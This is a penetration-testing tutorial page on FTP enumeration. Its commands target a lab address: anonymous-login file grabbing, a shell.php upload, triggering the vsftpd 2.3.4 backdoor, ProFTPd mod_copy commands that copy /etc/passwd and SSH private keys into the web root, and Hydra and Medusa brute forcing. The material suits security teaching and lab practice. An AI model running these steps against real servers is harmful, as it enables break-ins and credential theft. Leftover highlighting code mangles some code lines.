FTP Service Enumeration | Network Penetration Testing

FTP (File Transfer Protocol) is one of the oldest protocols on the internet, dating back to 1971. Despite its age, it remains widely deployed for file transfers. The problem? FTP transmits everything in plaintext, including credentials.

FTP credentials and file contents are transmitted unencrypted. If you capture network traffic, you can read everything. Many organizations still use it internally, making it a valuable target.

Anonymous FTP

bash

1606070;"># Many FTP servers allow anonymous login
2606070;"># Try these credentials:
3606070;"># anonymous / anonymous
4606070;"># anonymous / (blank)
5606070;"># anonymous / your@email.com
6 
7606070;"># Connect with ftp client
8ftp 10.10.10.10
9606070;"># Username: anonymous
10606070;"># Password: (press Enter or type anonymous)
11 
12606070;"># List files
13ftp> ls -la
14ftp> pwd
15 
16606070;"># Download everything
17ftp> binary
18ftp> mget *
19 
20606070;"># Upload files (if writable)
21ftp> put shell.php
22 
23606070;"># Passive mode (for firewalls)
24ftp> passive

Quick Anonymous Check

Use nmap script to quickly check for anonymous FTP: nmap -sV -p21 --script=ftp-anon 10.10.10.10

FTP Enumeration

bash

1606070;"># Nmap FTP scripts
2nmap -p21 --script=ftp-* 10.10.10.10
3 
4606070;"># Key scripts:
5606070;"># ftp-anon: Check anonymous login
6606070;"># ftp-bounce: Check FTP bounce vulnerability
7606070;"># ftp-brute: Brute force credentials
8606070;"># ftp-vsftpd-backdoor: Check for vsftpd 2.3.4 backdoor
9606070;"># ftp-proftpd-backdoor: Check for ProFTPd backdoor
10 
11606070;"># Banner grabbing
12nc -nv 10.10.10.10 21
13telnet 10.10.10.10 21
14 
15606070;"># Check version for vulnerabilities
16606070;"># Common vulnerable versions:
17606070;"># vsftpd 2.3.4 - Backdoor (port 6200 opens)
18606070;"># ProFTPd 1.3.5 - Mod_copy vulnerability
19606070;"># Pure-FTPd - Various depending on version
20 
21606070;"># Download entire FTP site
22wget -r ftp:606070;">//anonymous@10.10.10.10/
23wget -m --no-passive ftp:606070;">//user:pass@10.10.10.10/

Known FTP Exploits

bash

1606070;"># vsftpd 2.3.4 Backdoor
2606070;"># If vsftpd 2.3.4, login with username containing :)
3606070;"># Opens backdoor on port 6200
4 
5606070;"># Metasploit
6use exploit/unix/ftp/vsftpd_234_backdoor
7set RHOSTS 10.10.10.10
8exploit
9 
10606070;"># Manual check
11nc 10.10.10.10 21
12USER test:)
13PASS test
14606070;"># Then connect to port 6200
15nc 10.10.10.10 6200
16 
17606070;"># ProFTPd mod_copy (1.3.5)
18606070;"># Copy files without authentication
19nc 10.10.10.10 21
20SITE CPFR /etc/passwd
21SITE CPTO /var/www/html/passwd.txt
22 
23606070;"># Can copy SSH keys or webshells
24SITE CPFR /home/user/.ssh/id_rsa
25SITE CPTO /var/www/html/key.txt

The ProFTPd mod_copy vulnerability is particularly dangerous as it allows unauthenticated file copying anywhere on the filesystem!

Brute Force

bash

1606070;"># Hydra
2hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp:606070;">//10.10.10.10
3hydra -L users.txt -P passwords.txt ftp:606070;">//10.10.10.10
4 
5606070;"># Medusa
6medusa -h 10.10.10.10 -u admin -P passwords.txt -M ftp
7 
8606070;"># Nmap
9nmap -p21 --script=ftp-brute \
10  --script-args userdb=users.txt,passdb=pass.txt 10.10.10.10
11 
12606070;"># Common default credentials:
13606070;"># admin / admin
14606070;"># administrator / password
15606070;"># ftp / ftp
16606070;"># user / user

Knowledge Check

Quick Quiz

Question 1 of 1

What makes FTP particularly insecure?

Challenges

Anonymous FTP Hunt

Challenge

🌱 beginner

Connect to an FTP server and find sensitive files using anonymous access.

Need a hint? (3 available)

Key Takeaways

FTP transmits everything in plaintext - easy to sniff
Anonymous login is surprisingly common
vsftpd 2.3.4 has a famous backdoor (username containing :))
ProFTPd mod_copy allows unauthenticated file copying
Always check for upload capability - webshell opportunity

Related Lessons

SMB Enumeration

SSH Enumeration